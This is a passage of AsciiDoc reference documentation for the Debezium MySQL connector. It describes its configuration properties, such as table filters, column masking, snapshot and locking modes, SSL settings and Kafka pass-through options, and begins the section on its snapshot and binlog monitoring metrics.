connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number between 5400 and 6400 is generated, though the recommendation is to explicitly set a value. 
\n\n|[[mysql-property-database-history-kafka-topic]]<<mysql-property-database-history-kafka-topic, `database.history.kafka{zwsp}.topic`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[mysql-property-database-history-kafka-bootstrap-servers]]<<mysql-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>\n|\n|A list of host\/port pairs that the connector uses for establishing an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the Kafka Connect process.\n\n|[[mysql-property-database-whitelist]]\n[[mysql-property-database-include-list]]<<mysql-property-database-include-list, `database.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the names of the databases for which to capture changes. The connector does not capture changes in any database whose name is not in `database.include.list`. By default, the connector captures changes in all databases. \nDo not also set the `database.exclude.list` connector configuration property.\n\n|[[mysql-property-database-blacklist]]\n[[mysql-property-database-exclude-list]]<<mysql-property-database-exclude-list, `database.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the names of databases for which you do not want to capture changes. The connector captures changes in any database whose name is not in the `database.exclude.list`. \nDo not also set the `database.include.list` connector configuration property.\n\n|[[mysql-property-table-whitelist]]\n[[mysql-property-table-include-list]]<<mysql-property-table-include-list, `table.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers of tables whose changes you want to capture. The connector does not capture changes in any table not included in `table.include.list`. Each identifier is of the form _databaseName_._tableName_. By default, the connector captures changes in every non-system table in each database whose changes are being captured.\nDo not also specify the `table.exclude.list` connector configuration property.\n\n|[[mysql-property-table-blacklist]]\n[[mysql-property-table-exclude-list]]<<mysql-property-table-exclude-list, `table.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want to capture. The connector captures changes in any table not included in `table.exclude.list`. Each identifier is of the form _databaseName_._tableName_.\nDo not also specify the `table.include.list` connector configuration property.\n\n|[[mysql-property-column-blacklist]]\n[[mysql-property-column-exclude-list]]<<mysql-property-column-exclude-list, `column.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event record values. 
Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-include-list]]<<mysql-property-column-include-list, `column.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to include in change event record values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-truncate-to-length-chars]]<<mysql-property-column-truncate-to-length-chars, `column.truncate.to{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event record values if the field values are longer than the specified number of characters. You can configure multiple properties with different lengths in a single configuration. The length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-with-length-chars]]<<mysql-property-column-mask-with-length-chars, `column.mask.with{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. You can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-hash]]<<mysql-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in the change event record values. Pseudonyms consist of the hashed value obtained by applying the algorithm `_hashAlgorithm_` and salt `_salt_`. +\n +\nBased on the hash function used, referential integrity is kept while data is pseudonymized. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash result is automatically shortened to the length of the column. +\n +\nYou can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName` +\n +\n`CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the configured `_hashAlgorithm_`, the selected `_salt_`, and the actual data set, the resulting masked data set might not be completely anonymized.\n\n|[[mysql-property-column-propagate-source-type]]<<mysql-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. 
These schema parameters: \n\n`pass:[_]pass:[_]debezium.source.column.type` \n\n`pass:[_]pass:[_]debezium.source.column.length` \n \n`pass:[_]pass:[_]debezium.source.column.scale` \n\nare used to propagate the original type name, length, and scale. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of one of these forms: \n\n_databaseName_._tableName_._columnName_ \n\n_databaseName_._schemaName_._tableName_._columnName_\n\n|[[mysql-property-datatype-propagate-source-type]]<<mysql-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters: \n \n`pass:[_]pass:[_]debezium.source.column.type` \n\n`pass:[_]pass:[_]debezium.source.column.length`\n\n`pass:[_]pass:[_]debezium.source.column.scale` \n\nare used to propagate the original type name, length, and scale. This is useful to properly size corresponding columns in sink databases. Fully-qualified data type names are of one of these forms: \n\n_databaseName_._tableName_._typeName_ \n\n_databaseName_._schemaName_._tableName_._typeName_ \n \nSee {link-prefix}:{link-mysql-connector}#mysql-data-types[how MySQL connectors map data types] for the list of MySQL-specific data type names.\n\n|[[mysql-property-time-precision-mode]]<<mysql-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive_time{zwsp}_microseconds`\n|Time, date, and timestamps can be represented with different kinds of precision, including: +\n +\n`adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of TIME type fields, which are always captured as microseconds. +\n +\nifdef::community[]\n`adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\nendif::community[]\n +\n`connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which use millisecond precision regardless of the database columns' precision.\n\n|[[mysql-property-decimal-handling-mode]]<<mysql-property-decimal-handling-mode,`decimal.handling.mode`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[mysql-property-bigint-unsigned-handling-mode]]<<mysql-property-bigint-unsigned-handling-mode, `bigint.unsigned{zwsp}.handling.mode`>>\n|`long`\n|Specifies how BIGINT UNSIGNED columns should be represented in change events. 
Possible settings are: +\n +\n `long` represents values by using Java's `long`, which might not offer the precision of the original value but which is easy to use in consumers. `long` is usually the preferred setting. +\n +\n`precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events by using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type. Use this setting when working with values larger than 2^63, because these values cannot be conveyed by using `long`.\n\n|[[mysql-property-include-schema-changes]]<<mysql-property-include-schema-changes, `include.schema{zwsp}.changes`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded by using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history. \n\n|[[mysql-property-include-query]]<<mysql-property-include-query, `include.query`>>\n|`false`\n|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +\n +\nIf you set this option to `true` then you must also configure MySQL with the `binlog_rows_query_log_events` option set to `ON`. When `include.query` is `true`, the query is not present for events that the snapshot process generates. +\n +\nSetting `include.query` to `true` might expose tables or fields that are explicitly excluded or masked, because the original SQL statement is included in the change event. For this reason, the default setting is `false`.\n\n|[[mysql-property-event-processing-failure-handling-mode]]<<mysql-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling.mode`>>\n|`fail`\n|Specifies how the connector should react to exceptions during deserialization of binlog events. +\n +\n`fail` propagates the exception, which indicates the problematic event and its binlog offset, and causes the connector to stop. +\n +\n`warn` logs the problematic event and its binlog offset and then skips the event. +\n +\n`skip` passes over the problematic event and does not log anything.\n\n|[[mysql-property-inconsistent-schema-handling-mode]]<<mysql-property-inconsistent-schema-handling-mode, `inconsistent.schema{zwsp}.handling.mode`>>\n|`fail`\n|Specifies how the connector should react to binlog events that relate to tables that are not present in the internal schema representation. That is, the internal representation is not consistent with the database. +\n +\n`fail` throws an exception that indicates the problematic event and its binlog offset, and causes the connector to stop. +\n +\n`warn` logs the problematic event and its binlog offset and skips the event. +\n +\n`skip` passes over the problematic event and does not log anything.\n\n|[[mysql-property-max-queue-size]]<<mysql-property-max-queue-size, `max.queue.size`>>\n|`8192`\n|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slow or if Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector. 
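For example (an illustrative setting, not a tuning recommendation), a deployment that experiences slow Kafka writes might set `max.queue.size=16384` while keeping `max.batch.size` at its default of `2048`, giving the queue more headroom. 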
Defaults to 8192, and should always be larger than the maximum batch size specified by the `max.batch.size` property.\n\n|[[mysql-property-max-batch-size]]<<mysql-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|[[mysql-property-poll-interval-ms]]<<mysql-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[mysql-property-connect-timeout-ms]]<<mysql-property-connect-timeout-ms, `connect.timeout.ms`>>\n|`30000`\n|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.\n\n|[[mysql-property-gtid-source-includes]]<<mysql-property-gtid-source-includes, `gtid.source.includes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that match one of these include patterns are used.\nDo not also specify a setting for `gtid.source.excludes`.\n\n|[[mysql-property-gtid-source-excludes]]<<mysql-property-gtid-source-excludes, `gtid.source.excludes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that do not match any of these exclude patterns are used. Do not also specify a value for `gtid.source.includes`.\n\nifdef::community[]\n|[[mysql-property-gtid-new-channel-position]]<<mysql-property-gtid-new-channel-position, `gtid.new.channel.position`>> +\n_deprecated and scheduled for removal_\n|`earliest`\n|When set to `latest`, when the connector sees a new GTID channel, it starts consuming from the last executed transaction in that GTID channel. If set to `earliest` (default), the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have an active-passive MySQL setup where {prodname} is connected to the primary server. In this case, during failover, the replica with the new UUID (and GTID channel) starts receiving writes before {prodname} is connected. These writes would be lost when using `latest`.\nendif::community[]\n\n|[[mysql-property-tombstones-on-delete]]<<mysql-property-tombstones-on-delete, `tombstones.on.delete`>>\n|`true`\n|Controls whether a delete event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a delete event and a subsequent tombstone event. +\n +\n`false` - only a delete event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row. \n\n|[[mysql-property-message-key-columns]]<<mysql-property-message-key-columns, `message.key.columns`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. 
This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format (shown with spaces for clarity only) is: +\n +\n_database-name_ `.` _table-name_ `:` _regexp_ `;` ... +\n +\nFor example: +\n +\n`dbA.table_a:regex_1;dbB.table_b:regex_2;dbC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in the `id` column of `table_a` to a key field in change events that the connector sends to Kafka. \n\n|[[mysql-property-binary-handling-mode]]<<mysql-property-binary-handling-mode,`binary.handling.mode`>>\n|bytes\n|Specifies how binary columns, for example, `blob`, `binary`, `varbinary`, should be represented in change events. Possible settings: +\n +\n`bytes` represents binary data as a byte array. +\n +\n`base64` represents binary data as a base64-encoded String. +\n +\n`hex` represents binary data as a hex-encoded (base16) String.\n\n|===\n\n[id=\"mysql-advanced-connector-configuration-properties\"]\n.Advanced MySQL connector configuration properties\n\nThe following table describes {link-prefix}:{link-mysql-connector}#mysql-advanced-connector-configuration-properties[advanced MySQL connector properties]. The default values for these properties rarely need to be changed. Therefore, you do not need to specify them in the connector configuration.\n\n.Descriptions of MySQL connector advanced configuration properties\n[cols=\"30%a,20%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Default |Description\n\n|[[mysql-property-connect-keep-alive]]<<mysql-property-connect-keep-alive, `connect.keep.alive`>>\n|`true`\n|A Boolean value that specifies whether a separate thread should be used to ensure that the connection to the MySQL server\/cluster is kept alive.\n\n|[[mysql-property-table-ignore-builtin]]<<mysql-property-table-ignore-builtin, `table.ignore{zwsp}.builtin`>>\n|`true`\n|A Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table include and exclude lists. By default, system tables are excluded from having their changes captured, and no events are generated when changes are made to any system tables.\n\n|[[mysql-property-database-history-kafka-recovery-poll-interval-ms]]<<mysql-property-database-history-kafka-recovery-poll-interval-ms, `database.history{zwsp}.kafka.recovery{zwsp}.poll.interval.ms`>>\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|[[mysql-property-database-history-kafka-recovery-attempts]]<<mysql-property-database-history-kafka-recovery-attempts, `database.history{zwsp}.kafka.recovery{zwsp}.attempts`>>\n|`4`\n|The maximum number of times that the connector should try to read persisted history data before the connector recovery fails with an error. 
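For example, with the default settings the connector gives up after 4 attempts made at 100 millisecond intervals, that is, after roughly 4 x 100 ms = 400 ms without receiving data. 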
The maximum amount of time to wait after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|[[mysql-property-database-history-skip-unparseable-ddl]]<<mysql-property-database-history-skip-unparseable-ddl, `database.history{zwsp}.skip.unparseable{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector should ignore malformed or unknown database statements, or stop processing so a human can fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care because it can lead to data loss or mangling when the binlog is being processed.\n\n|[[mysql-property-database-history-store-only-monitored-tables-ddl]]<<mysql-property-database-history-store-only-monitored-tables-ddl, `database.history{zwsp}.store.only{zwsp}.monitored.tables{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector records all DDL statements or only those for tables whose changes are being captured: +\n +\n`true` records only those DDL statements that are relevant to tables whose changes are being captured by {prodname}. Set to `true` with care, because DDL statements that were not recorded might become necessary if you change which tables have their changes captured. +\n +\nThe safe default is `false`.\n\n|[[mysql-property-database-ssl-mode]]<<mysql-property-database-ssl-mode, `database.ssl.mode`>>\n|`disabled`\n|Specifies whether to use an encrypted connection. Possible settings are: +\n +\n`disabled` specifies the use of an unencrypted connection. +\n +\n`preferred` establishes an encrypted connection if the server supports secure connections. If the server does not support secure connections, the connector falls back to an unencrypted connection. +\n +\n`required` establishes an encrypted connection or fails if one cannot be made for any reason. +\n +\n`verify_ca` behaves like `required` but additionally verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and fails if the server TLS certificate does not match any valid CA certificates. +\n +\n`verify_identity` behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|[[mysql-property-binlog-buffer-size]]<<mysql-property-binlog-buffer-size, `binlog.buffer.size`>>\n|0\n|The size of a look-ahead buffer used by the binlog reader. The default setting of `0` disables buffering. +\n +\nUnder specific conditions, it is possible that the MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. +\n +\nWhen the beginning of a transaction is detected, {prodname} tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can determine whether to stream the changes from the transaction.\nThe size of the binlog buffer defines the maximum number of changes in the transaction that {prodname} can buffer while searching for transaction boundaries.\nIf the size of the transaction is larger than the buffer, then {prodname} must rewind and re-read the events that did not fit into the buffer while streaming. +\n +\nNOTE: This feature is incubating. Feedback is encouraged. It is expected that this feature is not completely polished.\n\n|[[mysql-property-snapshot-mode]]<<mysql-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for running a snapshot when the connector starts. 
Possible settings are: +\n +\n`initial` - the connector runs a snapshot only when no offsets have been recorded for the logical server name. +\n +\n`when_needed` - the connector runs a snapshot upon startup whenever it deems it necessary. That is, when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server. +\n +\n`never` - the connector never uses snapshots. Upon first startup with a logical server name, the connector reads from the beginning of the binlog. Configure this behavior with care. It is valid only when the binlog is guaranteed to contain the entire history of the database. +\n +\n`schema_only` - the connector runs a snapshot of the schemas and not the data. This setting is useful when you do not need the topics to contain a consistent snapshot of the data but need them to have only the changes since the connector was started. +\n +\n`schema_only_recovery` - this is a recovery setting for a connector that has already been capturing changes. When you restart the connector, this setting enables recovery of a corrupted or lost database history topic. You might set it periodically to \"clean up\" a database history topic that has been growing unexpectedly. Database history topics require infinite retention.\n\n|[[mysql-property-snapshot-locking-mode]]<<mysql-property-snapshot-locking-mode, `snapshot.locking{zwsp}.mode`>>\n|`minimal`\na|Controls whether and how long the connector holds the global MySQL read lock, which prevents any updates to the database, while the connector is performing a snapshot. Possible settings are: +\n +\n`minimal` - the connector holds the global read lock for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global read lock is no longer held and other MySQL clients are updating the database. +\n +\n`minimal_percona` - the connector holds link:https:\/\/www.percona.com\/doc\/percona-server\/5.7\/management\/backup_locks.html[the global backup lock] for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global backup lock is no longer held and other MySQL clients are updating the database. This mode does not flush tables to disk, is not blocked by long-running reads, and is available only in Percona Server. +\n +\n`extended` - blocks all writes for the duration of the snapshot. Use this setting if there are clients that are submitting operations that MySQL excludes from REPEATABLE READ semantics. +\n +\n`none` - prevents the connector from acquiring any table locks during the snapshot. While this setting is allowed with all snapshot modes, it is safe to use if and _only_ if no schema changes are happening while the snapshot is running. For tables defined with MyISAM engine, the tables would still be locked despite this property being set as MyISAM acquires a table lock. 
This behavior is unlike InnoDB engine, which acquires row level locks.\n\n|[[mysql-property-snapshot-select-statement-overrides]]<<mysql-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events captured from the binlog. Specify a comma-separated list of fully-qualified table names in the form _databaseName{zwsp}.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}._DB_NAME_._TABLE_NAME_`. For example, the name of the other configuration property might be: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}.customers{zwsp}.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[mysql-property-min-row-count-to-stream-results]]<<mysql-property-min-row-count-to-stream-results, `min.row.count.to{zwsp}.stream.results`>>\n|`1000`\n|During a snapshot, the connector queries each table for which the connector is configured to capture changes. The connector uses each query result to produce a read event that contains data for all rows in that table. This property determines whether the MySQL connector puts results for a table into memory, which is fast but requires large amounts of memory, or streams the results, which can be slower but work for very large tables. The setting of this property specifies the minimum number of rows a table must contain before the connector streams results. +\n +\nTo skip all table size checks and always stream all results during a snapshot, set this property to `0`.\n\n|[[mysql-property-heartbeat-interval-ms]]<<mysql-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. \n\n|[[mysql-property-heartbeat-topics-prefix]]<<mysql-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. 
The topic name has this pattern: +\n +\n_heartbeat.topics.prefix_._server.name_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mysql-property-database-initial-statements]]<<mysql-property-database-initial-statements, `database.initial{zwsp}.statements`>>\n|\n|A semicolon-separated list of SQL statements that are executed when the connector establishes a JDBC connection to the database. This does not apply to the connection that reads the transaction log.\nTo specify a semicolon as a character in an SQL statement and not as a delimiter, use two semicolons (`;;`). +\n +\nThe connector might establish JDBC connections at its own discretion, so this property is only for configuring session parameters. It is not for executing DML statements.\n\n|[[mysql-property-snapshot-delay-ms]]<<mysql-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors. \n\n|[[mysql-property-snapshot-fetch-size]]<<mysql-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[mysql-property-snapshot-lock-timeout-ms]]<<mysql-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[how MySQL connectors perform database snapshots].\n\n|[[mysql-property-enable-time-adjuster]]<<mysql-property-enable-time-adjuster, `enable.time{zwsp}.adjuster`>>\n|`true`\n|Boolean value that indicates whether the connector converts a 2-digit year specification to 4 digits. Set to `false` when conversion is fully delegated to the database. +\n +\nMySQL allows users to insert year values with either 2 digits or 4 digits. A 2-digit value is mapped to a year in the range 1970 - 2069. The default behavior is that the connector does the conversion. \n\nifdef::community[]\n|[[mysql-property-source-struct-version]]<<mysql-property-source-struct-version, `source.struct{zwsp}.version`>>\n|`v2`\n|Schema version for the `source` block in {prodname} events. {prodname} 0.10 introduced a few breaking changes to the structure of the `source` block in order to unify the exposed structure across all the connectors. +\n +\nBy setting this option to `v1`, the structure used in earlier versions can be produced. However, this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mysql-property-sanitize-field-names]]<<mysql-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key{zwsp}.converter` or `value{zwsp}.converter` property to the Avro converter. 
+\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[mysql-property-skipped-operations]]<<mysql-property-skipped-operations, `skipped.operations`>>\n|\n|Comma-separated list of operation types to skip during streaming. Values that you can specify are: `c` for inserts, `u` for updates, `d` for deletes. By default, no operations are skipped.\n\n|===\n\n[id=\"mysql-pass-through-configuration-properties\"]\n.Pass-through configuration properties\n\nThe MySQL connector also supports {link-prefix}:{link-mysql-connector}#mysql-pass-through-configuration-properties[pass-through configuration properties] that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history. All properties that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector start-up.\n\nFor example, the following connector configuration properties can be used to secure connections to the Kafka broker:\n\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nSee link:{link-kafka-docs}.html[the Kafka documentation] for more details about _pass-through_ properties.\n\n[id=\"mysql-pass-through-properties-for-database-drivers\"]\n.Pass-through properties for database drivers\n\nIn addition to the pass-through properties for the Kafka producer and consumer, there are {link-prefix}:{link-mysql-connector}#mysql-pass-through-properties-for-database-drivers[pass-through properties for database drivers]. These properties have the `database.` prefix. 
For example, `database.tinyInt1isBit=false` is passed to the JDBC URL.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mysql-connector-performance\n\/\/ Title: Monitoring {prodname} MySQL connector performance\n[[mysql-monitoring]]\n== Monitoring\n\nThe {prodname} MySQL connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-mysql-connector}#mysql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-mysql-connector}#mysql-binlog-metrics[Binlog metrics] provide information about connector operation when the connector is reading the binlog.\n* {link-prefix}:{link-mysql-connector}#mysql-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-mysql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of MySQL databases\n[[mysql-monitoring-snapshots]]\n[[mysql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the `HoldingGlobalLock` custom snapshot metric. This metric is set to a Boolean value that indicates whether the connector currently holds a global or table write lock. \n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-binlog-reading\n\/\/ Title: Monitoring {prodname} MySQL connector binlog reading\n[[mysql-connector-binlog-metrics]]\n[[mysql-binlog-metrics]]\n=== Binlog metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=binlog,server=<database.server.name>`.\n\nTransaction-related attributes are available only if binlog event buffering is enabled. See {link-prefix}:{link-mysql-connector}#mysql-property-binlog-buffer-size[`binlog.buffer.size`] in the advanced connector configuration properties for more details.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the following custom binlog metrics:\n\n.Descriptions of custom binlog metrics\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`BinlogFilename`\n|`string`\n|The name of the binlog file that the connector has most recently read.\n\n|`BinlogPosition`\n|`long`\n|The most recent position (in bytes) within the binlog that the connector has read.\n\n|`IsGtidModeEnabled`\n|`boolean`\n|Flag that denotes whether the connector is currently tracking GTIDs from MySQL server.\n\n|`GtidSet`\n|`string`\n|The string representation of the most recent GTID set processed by the connector when reading the binlog.\n\n|`NumberOfSkipped{zwsp}Events`\n|`long`\n|The number of events that have been skipped by the MySQL connector. 
